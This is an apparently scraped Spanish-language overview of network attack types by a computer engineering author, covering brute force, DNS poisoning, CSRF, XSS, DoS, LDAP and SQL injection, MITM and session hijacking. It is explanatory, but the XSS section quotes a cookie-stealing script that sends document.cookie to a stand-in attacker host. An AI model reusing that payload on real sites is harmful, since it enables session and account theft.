Вы находитесь на странице: 1из 10

Eduardo Snchez Pia

TIPOS DE ATAQUES A LA RED

Brute Force (Fuerza Bruta)

Los ataques de fuerza bruta o bsqueda exhaustiva de llaves (exhaustive key


search). Estos ataques se basan en algo muy simple: de manera automatizada
se van probando cada determinado perodo de tiempo y en determinados
lugares, distintas palabras hasta adivinar la contrasea.

Esto tiene origen en prcticas sociales. Hay una gran cantidad de


contraseas coincidentes en la vida de las personas. Por ejemplo, chupetin
(sin acento), caramelo o amelie son contraseas de las ms utilizadas,
adems del famoso 123456, pero las coincidencias de passwords entre las
personas son realmente muchas. Esto ha dado origen a colecciones de
estas palabras, de estos passwords ms comunes, que son utilizados para
ataques de fuerza bruta que van combinando trminos, alternando
palabras, nmeros y smbolos.
Cuando se trata de passwords cortos y simples, del estilo de caramelo,
estos ataques dan resultados muy rpidamente, pero cuando se trata de
contraseas alfanumricas (por ejemplo: c4r4M3l0! aunque en esta palabra
slo el ! aporta seguridad) encontrar una contrasea correcta puede
demandar miles de aos.
Un ataque de fuerza bruta te puede ayudar, por ejemplo, a recuperar tu
email en caso de que hayas olvidado la contrasea y no puedas
restablecerla.
Cuando olvidamos la contrasea de nuestro email, del router o alguna
cuenta, y no podemos restablecer la contrasea ni recuperarla, utilizar
software de fuerza bruta puede hacernos ms simple la vida. (Pablo)

Cache Poisoning (Envenenamiento de Cache) y


DNS Poisoning (Envenenamiento de DNS)

Ingeniero en computacin

Eduardo Snchez Pia

El envenenamiento de cach DNS, tambin conocida como suplantacin de


DNS, es un tipo de ataque que explota vulnerabilidades en el sistema de
nombres de dominio (DNS) para desviar el trfico de Internet de los servidores
confiables, a servidores falsos. Una de las razones de que el envenenamiento
DNS es tan peligroso, es porque puede propagarse de servidor DNS a servidor
DNS.
Cmo Funciona El DNS?
Cada vez que busca el nombre de un dominio, como hostdime.com.co, la
primer peticin se enva al servidor DNS. El servidor DNS responde con una o
ms direcciones IP en las que el equipo puede llegar a la direccin indicada, en
nuestro ejemplo a hostdime.com.co. Su equipo se conecta directamente a esa
direccin IP. El DNS convierte direcciones legibles como google.com en
direcciones IP legibles por el ordenador como 173.194.67.102.
Almacenamiento En Cach Del DNS
Internet no slo cuenta con un servidor DNS, ya que sera algo ineficiente. Tu
proveedor de servicios de Internet, ejecuta sus propios servidores DNS, esta
almacena informacin de otros servidores DNS. El router de tu hogar funciona
como un servidor DNS, que almacena informacin de los servidores DNS de tu
ISP. El equipo tiene una memoria cach de DNS local, por lo que puede hacer
referencia rpidamente a las bsquedas de DNS que han sido realizadas con
anterioridad, en lugar de realizar una bsqueda de DNS varias veces.

Tcnica Envenenamiento Cach De DNS


Una cach DNS puede llegar a ser envenenada si contiene una entrada
incorrecta. Por ejemplo, si un atacante obtiene el control de un servidor DNS y
cambia alguna de la informacin que exista en l, por ejemplo, podran
modificar la IP de alguna pgina en especfica y redireccionar la IP a la

Ingeniero en computacin

Eduardo Snchez Pia


direccin que desee el atacante. La IP del atacante podra contener algn tipo
de sitio web de phishing malicioso.
El envenenamiento de DNS tambin se puede propagar. Por ejemplo, si varios
proveedores de servicios de Internet estn recibiendo su informacin de DNS
desde un servidor comprometido, las entradas DNS envenenadas, se
extendern a los proveedores de servicios de Internet y luego sern
almacenadas en cach. Luego se extendern a los routers domsticos y las
cachs DNS en los equipos, con esto el atacante ya podra asegurar la infeccin
de una gran variedad de usuarios. (Hostdime)

Cross-Site
Request
Forgery
(CSRF)
falsificacin de peticin en sitios cruzados

La falsificacin de peticin en sitios cruzados (CSRF) es una vulnerabilidad


bastante comn en la que se consigue que un usuario lleve a cabo una accin
que no pretenda.
Esto puede ocurrir cuando, por ejemplo, el usuario ha iniciado sesin en una de
sus webs y hace click sobre un enlace aparentemente inofensivo. Por detrs, la
informacin de su perfil es actualizada y se cambia su correo electrnico con el
de un atacante. El atacante ahora puede solicitar un reseteo de contrasea sin
que nadie se entere y ha robado la cuenta con xito. (Laguna, 2012)

Cross-Site Scripting (XSS) o secuencias de


comandos en sitios cruzados

Ingeniero en computacin

Eduardo Snchez Pia

Cross-site Scripting (XSS) es una tcnica de ataque que fuerza un sitio web a
repetir el cdigo ejecutable suministrado por un atacante, el cual se carga en el
navegador del usuario. El cdigo normalmente est escrito en HTML/JavaScript,
pero tambin puede extenderse a VBScript, ActiveX, Java, Flash, o cualquier
otra tecnologa soportada por el navegador.
Cuando un atacante consigue que el navegador de un usuario ejecute su
cdigo, el cdigo se ejecutar dentro del contexto de seguridad (o zona) del
sitio web. Con este nivel de privilegio, el cdigo tiene la habilidad de leer,
modificar y transmitir cualquier dato sensible accesible por el navegador. Un
usuario objeto de este ataque podra tener su cuenta secuestrada (robo de
cookie), su navegador redirigido a otra direccin, o posiblemente mostrando
contenido fraudulento entregado por el sitio web que est visitando. Los
ataques de Cross-site Scripting comprometen esencialmente la relacin de
confianza entre el usuario y el sitio web.
Ejemplo
Ataque persistente
Muchos sitios web hospedan boletines de noticias donde usuarios registrados
pueden publicar mensajes. A un usuario registrado comnmente se le sigue la
pista usando una cookie de ID de sesin autorizndole para publicar mensajes.
Si un atacante public un mensaje conteniendo un javascript hbilmente
construido, un usuario leyendo este mensaje podra tener sus cookies y su
cuenta comprometidas.
Fragmento de cdigo de robo de cookie:
<SCRIPT>
document.location=
'http://attackerhost.example/cgi-bin/
cookiesteal.cgi?'+document.cookie
</SCRIPT>

Ingeniero en computacin

Eduardo Snchez Pia


(Web Application Security Consortium)

Denial of Service
En un ataque de denegacin de servicio (DoS), un atacante intenta evitar que
los usuarios legtimos tengan acceso a informacin o servicios. Al dirigirse a su
ordenador y su conexin a la red, o las computadoras y la red de los sitios que
usted est tratando de usar, un atacante puede ser capaz de impedirle el
acceso a correo electrnico, sitios web, cuentas en lnea (banca, etc.), u otros
servicios que confiar en el ordenador afectado.
El tipo ms comn y obvia de ataque DoS ocurre cuando un atacante
"inundaciones" una red con informacin. Cuando escribe una direccin URL de
un sitio web en particular en su navegador, usted est enviando una solicitud
al servidor de la computadora de ese sitio para ver la pgina. El servidor slo
puede procesar una cierta cantidad de solicitudes a la vez, por lo que si un
atacante sobrecarga el servidor con solicitudes, no puede procesar su solicitud.
Se trata de una "denegacin de servicio" porque no se puede acceder a ese
sitio.
Un atacante puede utilizar mensajes de correo electrnico de spam para lanzar
un ataque similar en su cuenta de correo electrnico. Si usted tiene una cuenta
de correo electrnico proporcionada por su empleador o una disponible a
travs de un servicio gratuito como Yahoo o Hotmail, se le asign una cuota
especfica, lo que limita la cantidad de datos que puede tener en su cuenta en
cualquier momento dado. Mediante el envo de muchos, o grandes mensajes,
correo electrnico a la cuenta, un atacante puede consumir su cuota, lo que
impide la recepcin de mensajes legtimos. (McDowell, 2013)

LDAP injection

Ingeniero en computacin

Eduardo Snchez Pia

Lightweight Directory Access Protocol (LDAP) Inyeccin es un ataque utilizada


para explotar las aplicaciones basadas en web que construyen sentencias LDAP
basado en la entrada del usuario. Cuando una aplicacin falla para desinfectar
adecuadamente la entrada del usuario, es posible modificar las declaraciones
LDAP usando un proxy local. Esto podra resultar en la ejecucin de comandos
arbitrarios, tales como la concesin de permisos a las consultas no autorizadas,
y la modificacin de contenido dentro del rbol LDAP. Las mismas tcnicas de
explotacin avanzadas disponibles en SQL Injection se pueden aplicar de
manera similar en inyeccin LDAP. (DuPaul)

Man-in-the-middle
Un ataque man-in-the-middle es un tipo de ataque ciberntico, donde actor
malicioso le inserta / a s misma en una conversacin entre dos partes,
suplanta ambos partidos y accede a la informacin de que las dos partes
estaban tratando de enviar a la otra. Un ataque man-in-the-middle permite
actor malicioso para interceptar, enviar y recibir datos destinados a otra
persona, o no destinado a ser enviado a todos, sin ninguna de las partes fuera
de saber hasta que sea demasiado tarde. Man-in-the-middle ataques pueden
ser abreviados de muchas maneras, incluyendo MITM, MitM, MiM o MIM.

Conceptos clave de un ataque Man-in-the-Middle

Man-in-the-middle es un tipo de ataque de espionaje que se produce


cuando un actor de malicioso inserta a s mismo como un rel /
apoderado en una sesin de comunicacin entre las personas o
sistemas.
Un ataque MITM explota el procesamiento en tiempo real de las
transacciones, conversaciones o transferencia de otros datos.

Ingeniero en computacin

Eduardo Snchez Pia

Man-in-the-middle ataques permiten a los atacantes intercepten, enviar


y recibir datos nunca la intencin de ser para ellos sin ninguna de las
partes fuera de saber hasta que sea demasiado tarde.

Man-in-the-Middle Ejemplos Ataque

En la imagen de arriba, te dars cuenta de que el atacante inserta l / ella


misma en el medio del flujo de trfico entre el cliente y el servidor. Ahora que
el atacante ha inmiscuido en la comunicacin entre los dos puntos finales, l /
ella puede inyectar datos falsos e interceptar los datos transferidos entre ellos.
A continuacin se muestra otro ejemplo de lo que podra suceder una vez que
el hombre en el medio ha insertado l / ella misma.

El pirata informtico se hace pasar por ambos lados de la conversacin para


tener acceso a los fondos. Este ejemplo es vlido para una conversacin con un
cliente y servidor, as como conversaciones de persona a persona. En el
ejemplo anterior, el atacante intercepta una clave pblica y con eso puede

Ingeniero en computacin

Eduardo Snchez Pia


incorporar sus propias credenciales para engaar a la gente en ambos
extremos en la creencia de que estn hablando el uno al otro de forma segura.
Interacciones susceptibles a los ataques MITM

Sitios financieros - entre sesin y autenticacin


Conexiones destinados a ser asegurados por las claves pblicas o
privadas
Otros sitios que requieren conexiones - donde hay algo que ganar por
tener acceso

(DuPaul)

Session hijacking attack

Tipos de Sesin Secuestro:


Activo Secuestro de sesiones

Secuestro de sesin activa implica el secuestro de una sesin ya


autenticado.
Activo Secuestro Sesin significa que el usuario original ha iniciado
sesin en su cuenta o perfil y luego atacante robar las cookies para
secuestrar la sesin activa y despus desconecte el usuario original del
servidor.

TRABAJO:

En Active Secuestro de sesiones, los atacantes utilizan secuencias de


comandos del lado del cliente para robar las cookies de los usuarios
originales mediante la participacin de las tcticas de ingeniera social
que incluye correos electrnicos, mensajera privada en los foros y en
otros sitios web de redes sociales.
Por qu lo llamamos secuestro de sesin activa porque los atacantes
necesitan interactuar y necesitan algunas acciones a realizar por la

Ingeniero en computacin

Eduardo Snchez Pia


vctima para robar la sesin de xito que puede elevar el nivel de
sospecha?
Pasivo Sesin Secuestro:

En pasivas atacantes secuestro de sesin no secuestrar sesin activa en


vez capturan las credenciales de inicio de sesin mientras el usuario
original est tratando de establecer una nueva conexin con el servidor,
y el atacante est sentado en silencio en la misma red y el registro de
las credenciales de inicio de sesin.

TRABAJO:

Pasivo Sesin secuestro implica el uso de herramientas de red sniffing


que captura de paquetes de datos y explotar la vulnerabilidad de
protocolo ARP envenenando la red. Los atacantes analizan los datos
capturados para recuperar datos de acceso del usuario.
Por qu lo llamamos pasiva secuestro de sesin porque los atacantes
no necesita para interactuar con el usuario y hacer que se realice
cualquier accin especfica? Hay menos riesgo de nivel de sospecha.

Sesin TCP Secuestro:


TCP secuestro es el tipo ms antiguo de secuestro de sesin. TCP secuestro de
sesin se ocupa en realidad con la prediccin exitosa de los nmeros de
secuencia iniciales que consigue intercambiados entre dos host. Un cliente y el
servidor.
Nmeros de secuencia se intercambian durante la conexin TCP de tres vas
apretn de manos.

Host A enva un SYN conjunto de bits de paquete al host B para crear


una nueva conexin.
Host B responder con los bits SYN / ACK establecidos paquete al host A
con un nmero de secuencia inicial.
Host A responder con ACK bit igual paquete al host B con nmero de
secuencia inicial + 1

As pues, si los atacantes logran predecir el nmero de secuencia inicial


entonces pueden realmente enviar el ltimo paquete de datos ACK al servidor,
spoofing como host original. Entonces pueden secuestrar la conexin TCP.

SQL Injection: inyeccin SQL


Inyeccin SQL es una tcnica de inyeccin de cdigo que explota una
vulnerabilidad de seguridad que ocurre en la capa de base de datos de una
aplicacin. La vulnerabilidad est presente cuando la entrada del usuario es o

Ingeniero en computacin

Eduardo Snchez Pia


incorrectamente filtra para caracteres de escape literales de cadena
incrustados en sentencias SQL o la entrada del usuario no es inflexible y con
ello ejecutado de forma inesperada. Es una instancia de una clase ms general
de las vulnerabilidades que puede ocurrir cada vez que un lenguaje de
programacin o de scripting est incrustado dentro de otro.
Inyeccin de SQL se utiliza para Hackear Aplicaciones Web.
Cmo funciona?
El usuario har aportaciones a la aplicacin Web.
Esto podra ser a travs de un formulario HTML (POST).
O un Dinmicamente Crafted Link (GET).
La aplicacin Web aceptar los datos de los usuarios y la procesan en la
consulta SQL segn la secuencia de comandos Web.
El servidor Web generar una salida para el usuario, en funcin de la
secuencia de comandos.
Por ejemplo, Entramos nuestros Credenciales Iniciar sesin en un
formulario de acceso y pulse Enviar. El servidor toma la Detalles y
cheques contra su base de datos del usuario. Si autenticado, se le
llevar a la pgina deseada.
Durante SQL Injection, el Usuario se presentar entrada malicioso que obliguen
a la consulta (que est dirigido por el inicio de sesin en el back-end) para
llevar a cabo una accin no deseada.
Qu puede resultar en?
El uso no autorizado de aplicacin Web. Inyeccin SQL comn puede resultar
en pasar de autenticacin de usuario
Dependiendo de los permisos de base de datos, tambin puede:

Introducir datos en la base de datos.


Datos recuperados de la base de datos usando SQLI.
Los datos an se pueden eliminar.

Aparte de esto, uno tambin puede:

Detener / Apagar el servidor SQL Server


Obtenga una Shell Web

(Saxena, 2014)

Ingeniero en computacin

Вам также может понравиться